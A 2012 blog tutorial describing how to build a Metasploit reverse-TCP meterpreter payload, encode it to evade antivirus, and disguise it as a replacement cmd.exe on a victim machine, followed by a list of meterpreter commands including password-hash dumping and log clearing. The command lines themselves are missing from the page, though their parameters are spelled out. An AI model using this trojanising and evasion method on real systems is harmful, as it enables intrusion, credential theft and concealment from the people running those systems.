Sabtu, 20 Oktober 2012

Transferring Crafted File part 2 : More Advanced Meterpreter

Ok...we continue our discussion, after we learn and know most the type of payload metasplioit profides, now we try to learn to make crafted file that use msfpayload and msfencode combination . Msfencode is purpose to bypass anti virus detection of our exploit files we sent to our victim.
Ok enough talking and do more...^^, lets practicing
1. Run this command
the command above means :
  • we create payload using msfpayload module meterpreter reverse tcp
  • we use listening host (our ip) 192.168.56.1
  • we use listening port 6789
  • we encode using msfencode using shikata ga nai encoder
  • we also make 5 times iteration to make the code (-c 5)
  • we create exe file (-t exe)
  • save file as cmd.exe
wait a minute....there are liltle bit attention...look at cmd.exe file we crafted (73 KB on mine)... and compare it with real cmd.exe (380 KB) size from windows, for beginner user it'll no problem but if we face medium user he will check the size of cmd.exe..because it's not run as usual. So if we want to make our file more perfect we can modified our command. 
First copy real cmd.exe file from windows xp rename the file into ex. cmd2.exe. then we can run this command :

then copy our crafted file (cmd3.exe) to windows and try to overwrite real cmd.exe by renaming our file name.

2. Run handler
Because we selected reverse meterpreter payload, we need to setup the exploit handler to handle the connection back to our attacking machine. In this case attacker use IP address 192.168.56.1. Go to Metasploit console by typing msfconsole, and then run :

3. Run our crafted file (cmd3.exe) or for real wait victim using cmd.exe (after we overwrite real cmd file), and from our shell should look like :

Done ^^
More Advanced Meterpreter
because we have some duty to finish, so we try to continue using meterpreter advantage to control victim system. Use ? or -h for list of command
Here we are after we using some of command :

^^....we try to disable mouse and keyboard of our lab...and done..haha, and now we try several commands
meterpreter>help  #meterpreter help#
meterpreter>hashdump  #dump windows system hash values#
meterpreter>sysinfo  #system information#
meterpreter>shell   #To get command prompt (cmd.exe)#
meterpreter>background  #Return to  msf console#
meterpreter>ps  #process list#
meterpreter>execute -f notepad.exe  #To execute notepad in victim machine#
meterpreter>clearev   #To clean all system logs#
meterpreter>screenshot   #Take a snapshot of victim desktop#

result :














Diposting oleh di

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)